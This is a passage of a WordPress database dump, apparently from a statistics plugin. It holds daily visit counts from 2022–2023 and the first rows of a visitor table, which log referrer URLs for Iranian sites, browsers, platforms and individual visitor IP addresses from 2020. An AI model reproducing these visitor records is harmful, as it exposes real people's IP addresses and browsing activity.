(10013,'2022-11-17 21:38:03','2022-11-17',39),
(10014,'2022-11-18 23:37:13','2022-11-18',78),
(10015,'2022-11-19 23:46:05','2022-11-19',53),
(10016,'2022-11-20 22:40:09','2022-11-20',70),
(10017,'2022-11-21 23:11:22','2022-11-21',48),
(10018,'2022-11-22 23:17:38','2022-11-22',81),
(10019,'2022-11-23 23:59:03','2022-11-23',85),
(10020,'2022-11-24 23:24:59','2022-11-24',71),
(10021,'2022-11-25 23:01:08','2022-11-25',98),
(10022,'2022-11-26 23:39:19','2022-11-26',67),
(10023,'2022-11-27 23:58:10','2022-11-27',126),
(10024,'2022-11-28 23:58:03','2022-11-28',84),
(10025,'2022-11-29 23:32:50','2022-11-29',95),
(10026,'2022-11-30 23:28:45','2022-11-30',95),
(10027,'2022-12-01 21:49:37','2022-12-01',59),
(10028,'2022-12-02 23:42:55','2022-12-02',59),
(10029,'2022-12-03 23:57:32','2022-12-03',126),
(10030,'2022-12-04 21:59:13','2022-12-04',104),
(10031,'2022-12-05 23:43:14','2022-12-05',111),
(10032,'2022-12-06 23:01:04','2022-12-06',64),
(10033,'2022-12-07 23:43:35','2022-12-07',80),
(10034,'2022-12-08 23:55:09','2022-12-08',84),
(10035,'2022-12-09 22:34:06','2022-12-09',90),
(10036,'2022-12-10 23:48:32','2022-12-10',135),
(10037,'2022-12-11 23:54:01','2022-12-11',190),
(10038,'2022-12-12 22:41:21','2022-12-12',45),
(10039,'2022-12-13 22:43:36','2022-12-13',161),
(10040,'2022-12-14 23:24:26','2022-12-14',125),
(10041,'2022-12-15 22:51:43','2022-12-15',74),
(10042,'2022-12-16 23:24:34','2022-12-16',68),
(10043,'2022-12-17 21:54:20','2022-12-17',45),
(10044,'2022-12-18 23:12:39','2022-12-18',83),
(10045,'2022-12-19 22:01:34','2022-12-19',40),
(10046,'2022-12-20 23:42:00','2022-12-20',78),
(10047,'2022-12-21 23:44:10','2022-12-21',104),
(10048,'2022-12-22 23:54:35','2022-12-22',106),
(10049,'2022-12-23 23:36:44','2022-12-23',97),
(10050,'2022-12-24 22:00:32','2022-12-24',64),
(10051,'2022-12-25 22:48:19','2022-12-25',64),
(10052,'2022-12-26 23:46:40','2022-12-26',89),
(10053,'2022-12-27 23:00:01','2022-12-27',41),
(10054,'2022-12-28 23:57:16','2022-12-28',76),
(10055,'2022-12-29 23:17:48','2022-12-29',84),
(10056,'2022-12-30 23:38:42','2022-12-30',70),
(10057,'2022-12-31 23:54:49','2022-12-31',51),
(10058,'2023-01-01 23:34:12','2023-01-01',64),
(10059,'2023-01-02 23:21:37','2023-01-02',51),
(10060,'2023-01-03 23:16:07','2023-01-03',71),
(10061,'2023-01-04 23:53:53','2023-01-04',111),
(10062,'2023-01-05 23:49:03','2023-01-05',80),
(10063,'2023-01-06 23:57:41','2023-01-06',71),
(10064,'2023-01-07 23:53:19','2023-01-07',65),
(10065,'2023-01-08 22:41:14','2023-01-08',80),
(10066,'2023-01-09 23:05:16','2023-01-09',66),
(10067,'2023-01-10 23:54:32','2023-01-10',57),
(10068,'2023-01-11 23:01:15','2023-01-11',92),
(10069,'2023-01-12 23:43:31','2023-01-12',60),
(10070,'2023-01-13 23:33:14','2023-01-13',102),
(10071,'2023-01-14 22:04:40','2023-01-14',60),
(10072,'2023-01-15 23:47:14','2023-01-15',49),
(10073,'2023-01-16 23:39:16','2023-01-16',57),
(10074,'2023-01-17 23:31:22','2023-01-17',68),
(10075,'2023-01-18 21:49:47','2023-01-18',55),
(10076,'2023-01-19 23:29:32','2023-01-19',73),
(10077,'2023-01-20 23:44:05','2023-01-20',59),
(10078,'2023-01-21 23:48:12','2023-01-21',62),
(10079,'2023-01-22 05:29:33','2023-01-22',63),
(10080,'2023-01-23 19:29:38','2023-01-23',72),
(10130,'2023-01-24 19:27:35','2023-01-24',88),
(10141,'2023-01-25 19:28:27','2023-01-25',87),
(10160,'2023-01-26 19:28:17','2023-01-26',54),
(10177,'2023-01-27 19:28:41','2023-01-27',100),
(10186,'2023-01-28 19:29:29','2023-01-28',95),
(10198,'2023-01-29 19:28:47','2023-01-29',88),
(10209,'2023-01-30 19:29:07','2023-01-30',67),
(10223,'2023-01-31 19:29:17','2023-01-31',106),
(10230,'2023-02-01 19:28:34','2023-02-01',74),
(10266,'2023-02-02 19:29:22','2023-02-02',148),
(10291,'2023-02-03 19:27:20','2023-02-03',100),
(10306,'2023-02-04 19:28:15','2023-02-04',72),
(10319,'2023-02-05 19:28:07','2023-02-05',66),
(10334,'2023-02-06 19:28:04','2023-02-06',80),
(10349,'2023-02-07 19:29:00','2023-02-07',116),
(10360,'2023-02-08 19:29:09','2023-02-08',66),
(10373,'2023-02-09 19:28:44','2023-02-09',53),
(10379,'2023-02-10 19:29:13','2023-02-10',116),
(10384,'2023-02-11 18:17:15','2023-02-11',159),
(10403,'2023-02-12 19:04:03','2023-02-12',45),
(10425,'2023-02-13 18:51:02','2023-02-13',289),
(10434,'2023-02-14 19:46:39','2023-02-14',135),
(10455,'2023-02-15 19:49:41','2023-02-15',100),
(10492,'2023-02-16 19:34:17','2023-02-16',313),
(10513,'2023-02-17 19:35:49','2023-02-17',134),
(10543,'2023-02-18 18:54:14','2023-02-18',134),
(10570,'2023-02-19 18:36:55','2023-02-19',75),
(10576,'2023-02-20 20:19:23','2023-02-20',255),
(10583,'2023-02-21 15:17:24','2023-02-21',144),
(10676,'2023-02-23 11:39:11','2023-02-23',91),
(10677,'2023-02-24 19:27:54','2023-02-24',154),
(10761,'2023-02-25 19:29:58','2023-02-25',74),
(10765,'2023-02-26 19:34:42','2023-02-26',205),
(10785,'2023-02-27 19:10:15','2023-02-27',352),
(10817,'2023-02-28 18:28:29','2023-02-28',248),
(10826,'2023-03-01 20:03:28','2023-03-01',77),
(10844,'2023-03-02 19:20:43','2023-03-02',89),
(10852,'2023-03-03 18:43:19','2023-03-03',144),
(10864,'2023-03-04 19:23:21','2023-03-04',388),
(10907,'2023-03-05 19:47:27','2023-03-05',212),
(10915,'2023-03-06 18:53:36','2023-03-06',257),
(10962,'2023-03-07 19:44:38','2023-03-07',179),
(10988,'2023-03-08 18:48:07','2023-03-08',175),
(11036,'2023-03-09 19:18:43','2023-03-09',119),
(11066,'2023-03-10 19:20:24','2023-03-10',117),
(11084,'2023-03-11 18:50:40','2023-03-11',121),
(11123,'2023-03-12 19:42:22','2023-03-12',464),
(11129,'2023-03-13 19:28:30','2023-03-13',296),
(11170,'2023-03-14 18:58:23','2023-03-14',101),
(11191,'2023-03-15 18:52:36','2023-03-15',78),
(11204,'2023-03-16 20:00:06','2023-03-16',448),
(11212,'2023-03-17 19:33:23','2023-03-17',220),
(11236,'2023-03-18 17:53:17','2023-03-18',294),
(11279,'2023-03-19 18:14:08','2023-03-19',123),
(11296,'2023-03-20 17:18:09','2023-03-20',212),
(11307,'2023-03-21 19:45:25','2023-03-21',68),
(11316,'2023-03-22 18:12:56','2023-03-22',91),
(11331,'2023-03-23 19:06:47','2023-03-23',99),
(11356,'2023-03-24 18:32:01','2023-03-24',129),
(11375,'2023-03-25 19:52:04','2023-03-25',64),
(11387,'2023-03-26 19:53:11','2023-03-26',72),
(11396,'2023-03-27 19:00:16','2023-03-27',65),
(11401,'2023-03-28 19:35:51','2023-03-28',478),
(11413,'2023-03-29 18:46:32','2023-03-29',229),
(11582,'2023-03-30 18:19:43','2023-03-30',83),
(11728,'2023-03-31 19:11:31','2023-03-31',240),
(11734,'2023-04-01 19:13:00','2023-04-01',57),
(11751,'2023-04-02 19:46:48','2023-04-02',195),
(11760,'2023-04-03 19:29:08','2023-04-03',222),
(11775,'2023-04-04 19:27:03','2023-04-04',168),
(11797,'2023-04-05 17:35:50','2023-04-05',138),
(11805,'2023-04-06 19:48:37','2023-04-06',501),
(11856,'2023-04-07 19:24:42','2023-04-07',108),
(11869,'2023-04-08 19:35:34','2023-04-08',321),
(11881,'2023-04-09 19:34:13','2023-04-09',359),
(11917,'2023-04-10 19:25:10','2023-04-10',243),
(12099,'2023-04-11 19:42:50','2023-04-11',248),
(12139,'2023-04-12 19:06:12','2023-04-12',139),
(12173,'2023-04-13 19:27:52','2023-04-13',102),
(12197,'2023-04-14 18:43:50','2023-04-14',88),
(12207,'2023-04-15 19:42:12','2023-04-15',373),
(12220,'2023-04-16 19:22:41','2023-04-16',149),
(12265,'2023-04-17 19:19:37','2023-04-17',261),
(12277,'2023-04-18 19:02:08','2023-04-18',192),
(12289,'2023-04-19 19:15:24','2023-04-19',128),
(12299,'2023-04-20 18:55:15','2023-04-20',328),
(12337,'2023-04-21 18:58:11','2023-04-21',82),
(12357,'2023-04-22 19:34:45','2023-04-22',50),
(12370,'2023-04-23 18:39:24','2023-04-23',66),
(12378,'2023-04-24 18:13:22','2023-04-24',204),
(12380,'2023-04-25 19:03:17','2023-04-25',193),
(12405,'2023-04-26 19:29:27','2023-04-26',66),
(12431,'2023-04-27 19:22:12','2023-04-27',89),
(12454,'2023-04-28 19:18:35','2023-04-28',101),
(12464,'2023-04-29 19:17:32','2023-04-29',168),
(12495,'2023-04-30 19:26:01','2023-04-30',139),
(12558,'2023-05-01 19:25:18','2023-05-01',351),
(12572,'2023-05-02 20:45:37','2023-05-02',188),
(12618,'2023-05-03 19:47:14','2023-05-03',123),
(12625,'2023-05-04 17:16:41','2023-05-04',407),
(12662,'2023-05-05 19:32:05','2023-05-05',185),
(12671,'2023-05-06 19:14:17','2023-05-06',378),
(12693,'2023-05-07 20:33:02','2023-05-07',658),
(12703,'2023-05-08 19:31:37','2023-05-08',486),
(12707,'2023-05-09 18:53:45','2023-05-09',331),
(12714,'2023-05-10 19:12:30','2023-05-10',162),
(12750,'2023-05-11 19:23:43','2023-05-11',113),
(12770,'2023-05-12 19:25:49','2023-05-12',150),
(12782,'2023-05-13 19:37:37','2023-05-13',81),
(12789,'2023-05-14 19:31:36','2023-05-14',251),
(12794,'2023-05-15 18:57:51','2023-05-15',282),
(12830,'2023-05-16 19:03:18','2023-05-16',91),
(12864,'2023-05-17 20:45:06','2023-05-17',189),
(12881,'2023-05-18 19:28:10','2023-05-18',284),
(12887,'2023-05-19 19:32:01','2023-05-19',179),
(12902,'2023-05-20 20:02:25','2023-05-20',370),
(12919,'2023-05-21 18:31:38','2023-05-21',201),
(12931,'2023-05-22 19:09:21','2023-05-22',355),
(12946,'2023-05-23 19:12:19','2023-05-23',201),
(12989,'2023-05-24 19:02:22','2023-05-24',480),
(13007,'2023-05-25 19:49:42','2023-05-25',240),
(13015,'2023-05-26 20:12:10','2023-05-26',111),
(13037,'2023-05-27 18:56:40','2023-05-27',341),
(13061,'2023-05-28 19:22:51','2023-05-28',155),
(13206,'2023-05-29 18:14:53','2023-05-29',342),
(13251,'2023-05-30 18:49:11','2023-05-30',308),
(13266,'2023-05-31 19:31:10','2023-05-31',233),
(13303,'2023-06-01 19:42:46','2023-06-01',287),
(13317,'2023-06-02 19:36:09','2023-06-02',417),
(13337,'2023-06-03 19:26:45','2023-06-03',785),
(13550,'2023-06-04 19:35:03','2023-06-04',975),
(13593,'2023-06-05 19:33:34','2023-06-05',139),
(13718,'2023-06-06 19:30:08','2023-06-06',247),
(13775,'2023-06-07 19:45:05','2023-06-07',181),
(13789,'2023-06-08 19:27:07','2023-06-08',347),
(13799,'2023-06-09 18:51:38','2023-06-09',79),
(14005,'2023-06-10 19:42:54','2023-06-10',194),
(14015,'2023-06-11 19:38:32','2023-06-11',216),
(14041,'2023-06-12 19:35:17','2023-06-12',471),
(14053,'2023-06-13 18:28:55','2023-06-13',186),
(14087,'2023-06-14 19:23:34','2023-06-14',106),
(14111,'2023-06-15 17:29:26','2023-06-15',134),
(14153,'2023-06-16 19:35:49','2023-06-16',155),
(14181,'2023-06-17 19:13:28','2023-06-17',99),
(14199,'2023-06-18 18:43:45','2023-06-18',436),
(14211,'2023-06-19 19:45:36','2023-06-19',387),
(14224,'2023-06-20 19:38:09','2023-06-20',268),
(14244,'2023-06-21 19:46:43','2023-06-21',155),
(14260,'2023-06-22 19:27:31','2023-06-22',364),
(14277,'2023-06-23 18:48:47','2023-06-23',279),
(14296,'2023-06-24 18:47:41','2023-06-24',246),
(14316,'2023-06-25 19:35:18','2023-06-25',412),
(14360,'2023-06-26 19:24:42','2023-06-26',471),
(14397,'2023-06-27 19:40:29','2023-06-27',186),
(14417,'2023-06-28 19:28:14','2023-06-28',122),
(14446,'2023-06-29 18:52:22','2023-06-29',124),
(14467,'2023-06-30 18:39:11','2023-06-30',136),
(14489,'2023-07-01 19:11:21','2023-07-01',134),
(14528,'2023-07-02 19:24:53','2023-07-02',276),
(14545,'2023-07-03 17:57:20','2023-07-03',318),
(14563,'2023-07-04 19:28:50','2023-07-04',336),
(14599,'2023-07-05 19:24:48','2023-07-05',142),
(14608,'2023-07-06 17:58:39','2023-07-06',296),
(14628,'2023-07-07 19:27:34','2023-07-07',88),
(14660,'2023-07-08 19:15:22','2023-07-08',94),
(14679,'2023-07-09 18:31:37','2023-07-09',88),
(14688,'2023-07-10 20:28:31','2023-07-10',73),
(14715,'2023-07-11 23:50:07','2023-07-11',332),
(14728,'2023-07-12 09:42:10','2023-07-12',175);
/*!40000 ALTER TABLE `wp_statistics_visit` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_visitor`
--
DROP TABLE IF EXISTS `wp_statistics_visitor`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_visitor` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`last_counter` date NOT NULL,
`referred` text CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`agent` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`platform` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`version` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`device` varchar(180) DEFAULT NULL,
`model` varchar(180) DEFAULT NULL,
`UAString` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`ip` varchar(60) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`location` varchar(10) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`user_id` bigint(48) NOT NULL,
`hits` int(11) DEFAULT NULL,
`honeypot` int(11) DEFAULT NULL,
PRIMARY KEY (`ID`),
UNIQUE KEY `date_ip_agent` (`last_counter`,`ip`,`agent`(75),`platform`(75),`version`(75)),
KEY `agent` (`agent`),
KEY `platform` (`platform`),
KEY `version` (`version`),
KEY `location` (`location`),
KEY `device` (`device`),
KEY `model` (`model`),
KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=35718 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_visitor`
--
LOCK TABLES `wp_statistics_visitor` WRITE;
/*!40000 ALTER TABLE `wp_statistics_visitor` DISABLE KEYS */;
INSERT INTO `wp_statistics_visitor` VALUES
(1,'2020-02-02','http://ictbank.ir/blog/wp-admin/plugins.php','Firefox','Fedora','Unknown',NULL,NULL,NULL,'5.113.138.82','000',0,NULL,NULL),
(2,'2020-02-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,10,0),
(3,'2020-02-02','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','192.84.34.84','000',0,7,0),
(4,'2020-02-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(5,'2020-02-03','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','172.27.249.81','000',0,1,0),
(6,'2020-02-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','103.235.197.253','000',0,3,0),
(7,'2020-02-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','41.179.253.229','000',0,3,0),
(8,'2020-02-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.192.138','000',0,1,0),
(9,'2020-02-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(10,'2020-02-04','http://ictbank.ir/blog','Chrome','iOS','13.0',NULL,NULL,'','86.55.40.172','000',0,1,0),
(11,'2020-02-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.151.185','000',0,1,0),
(12,'2020-02-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.222.116','000',0,1,0),
(13,'2020-02-05','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','62.234.161.45','000',0,2,0),
(14,'2020-02-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.42','000',0,3,0),
(15,'2020-02-05','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','5.112.94.80','000',0,2,0),
(16,'2020-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(17,'2020-02-05','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','172.27.250.45','000',0,5,0),
(18,'2020-02-05','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','172.27.250.54','000',0,1,0),
(19,'2020-02-05','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','193.112.182.115','000',0,2,0),
(20,'2020-02-05','http://ictbank.ir/blog','Safari','iOS','12.4',NULL,NULL,'','91.251.170.93','000',0,1,0),
(21,'2020-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.40.185','000',0,1,0),
(22,'2020-02-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.125.82','000',0,1,0),
(23,'2020-02-05','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','45.61.164.73','000',0,1,0),
(24,'2020-02-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','169.197.108.38','000',0,1,0),
(25,'2020-02-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.57.40.38','000',0,3,0),
(26,'2020-02-06','http://82.102.9.14/blog/','Chrome','Windows','6.2',NULL,NULL,'','82.102.9.14','000',0,1,0),
(27,'2020-02-06','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','179.61.177.84','000',0,1,0),
(28,'2020-02-06','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','172.27.250.240','000',0,1,0),
(29,'2020-02-06','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','89.199.236.99','000',0,1,0),
(30,'2020-02-06','http://l.instagram.com/?u=http%3A%2F%2Fwww.ictbank.ir%2F&e=AT2o4r3GS35ERbVQdPfbiWrpbLiyc1fLhpAt5d-3Cv5agYVVrQvj9NK9ZR77D_nvGs4tQoaWq_JEq9lRRMkasRsPu3ApKhz4SGoLynv3S7S0KWQZ7YRNhe9fk1I','Instagram','iOS','12.4.5',NULL,NULL,'','37.202.246.105','000',0,2,0),
(31,'2020-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.76.201','000',0,1,0),
(32,'2020-02-06','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.94.20.157','000',0,1,0),
(33,'2020-02-06','http://82.102.9.14:80/blog','Firefox','Linux','Unknown',NULL,NULL,'','179.43.169.182','000',0,1,0),
(34,'2020-02-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.149.52','000',0,1,0),
(35,'2020-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.171.222','000',0,1,0),
(36,'2020-02-06','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','179.61.247.92','000',0,2,0),
(37,'2020-02-06','http://ictbank.ir/blog','Samsung Internet','Android','9',NULL,NULL,'','172.27.251.50','000',0,1,0),
(38,'2020-02-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.145.18.66','000',0,1,0),
(39,'2020-02-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(40,'2020-02-06','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.207.39.189','000',0,1,0),
(41,'2020-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.126.103.73','000',0,1,0),
(42,'2020-02-07','https://l.instagram.com/','Instagram','Android','7.0',NULL,NULL,'','5.113.235.43','000',0,6,0),
(43,'2020-02-07','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','39.135.1.160','000',0,1,0),
(44,'2020-02-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.191','000',0,1,0),
(45,'2020-02-07','http://www.design-arena.ir/blog/','Chrome','Windows','6.2',NULL,NULL,'','82.102.9.14','000',0,6,0),
(46,'2020-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.121.171.145','000',0,1,0),
(47,'2020-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.87.222','000',0,1,0),
(48,'2020-02-07','android-app://com.linkedin.android','Chrome','Android','8.0.0',NULL,NULL,'','85.17.164.43','000',0,2,0),
(49,'2020-02-07','http://ictbank.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','111.206.59.134','000',0,1,0),
(50,'2020-02-07','http://82.102.9.14:80','Internet Explorer','Windows','6.1',NULL,NULL,'','107.151.148.166','000',0,1,0),
(51,'2020-02-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.104.230','000',0,1,0),
(52,'2020-02-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.144.254.138','000',0,1,0),
(53,'2020-02-07','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','178.171.114.184','000',0,1,0),
(54,'2020-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(55,'2020-02-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.133.154','000',0,1,0),
(56,'2020-02-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.116','000',0,3,0),
(57,'2020-02-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.89.84.155','000',0,1,0),
(58,'2020-02-08','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.174.40.8','000',0,10,0),
(59,'2020-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.92.8','000',0,1,0),
(60,'2020-02-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(61,'2020-02-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.108.203','000',0,1,0),
(62,'2020-02-08','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.242.34.105','000',0,3,0),
(63,'2020-02-08','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','209.99.174.202','000',0,2,0),
(64,'2020-02-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(65,'2020-02-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','159.89.135.252','000',0,1,0),
(66,'2020-02-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.192.138','000',0,1,0),
(67,'2020-02-08','http://www.design-arena.ir/','Firefox','Windows','10.0',NULL,NULL,'','212.83.134.142','000',0,1,0),
(68,'2020-02-08','http://ictbank.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','27.115.124.74','000',0,1,0),
(69,'2020-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.160.112.5','000',0,1,0),
(70,'2020-02-09','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','139.59.67.152','000',0,1,0),
(71,'2020-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.155.218.95','000',0,1,0),
(72,'2020-02-09','http://design-arena.ir/blog/','Chrome','OS X','10.13.5',NULL,NULL,'','5.188.84.197','000',0,2,0),
(73,'2020-02-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.223.2.234','000',0,1,0),
(74,'2020-02-09','http://design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','188.163.104.73','000',0,1,0),
(75,'2020-02-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.144.254.138','000',0,1,0),
(76,'2020-02-09','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','216.245.196.222','000',0,1,0),
(77,'2020-02-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(78,'2020-02-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(79,'2020-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.75.211.131','000',0,1,0),
(80,'2020-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.120.202','000',0,1,0),
(81,'2020-02-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','51.89.21.106','000',0,1,0),
(82,'2020-02-10','http://ictbank.ir/blog','Safari','OS X','10.12.6',NULL,NULL,'','111.206.52.101','000',0,1,0),
(83,'2020-02-10','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(84,'2020-02-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','130.185.78.133','000',0,1,0),
(85,'2020-02-10','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','5.56.134.30','000',0,1,0),
(86,'2020-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.87.33','000',0,1,0),
(87,'2020-02-10','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','88.198.164.134','000',0,1,0),
(88,'2020-02-10','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.77.249.202','000',0,1,0),
(89,'2020-02-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.34.176.104','000',0,1,0),
(90,'2020-02-11','http://www.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(91,'2020-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.245.53','000',0,1,0),
(92,'2020-02-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','61.147.103.122','000',0,1,0),
(93,'2020-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.145.146.133','000',0,56,0),
(94,'2020-02-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.223.209','000',0,1,0),
(95,'2020-02-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','116.196.90.48','000',0,2,0),
(96,'2020-02-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.198.78','000',0,2,0),
(97,'2020-02-11','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','169.48.92.142','000',0,1,0),
(98,'2020-02-11','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(99,'2020-02-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.154.34','000',0,1,0),
(100,'2020-02-12','http://82.102.9.14/','Sogou Explorer','Windows','6.1',NULL,NULL,'','198.15.181.4','000',0,1,0),
(101,'2020-02-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','47.94.102.174','000',0,1,0),
(102,'2020-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.136.177','000',0,1,0),
(103,'2020-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.134.93','000',0,1,0),
(104,'2020-02-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(105,'2020-02-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.166.114.112','000',0,1,0),
(106,'2020-02-12','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.68.152.26','000',0,1,0),
(107,'2020-02-13','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.162','000',0,1,0),
(108,'2020-02-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','158.69.220.178','000',0,2,0),
(109,'2020-02-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.173.145.40','000',0,1,0),
(110,'2020-02-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.38.160.78','000',0,1,0),
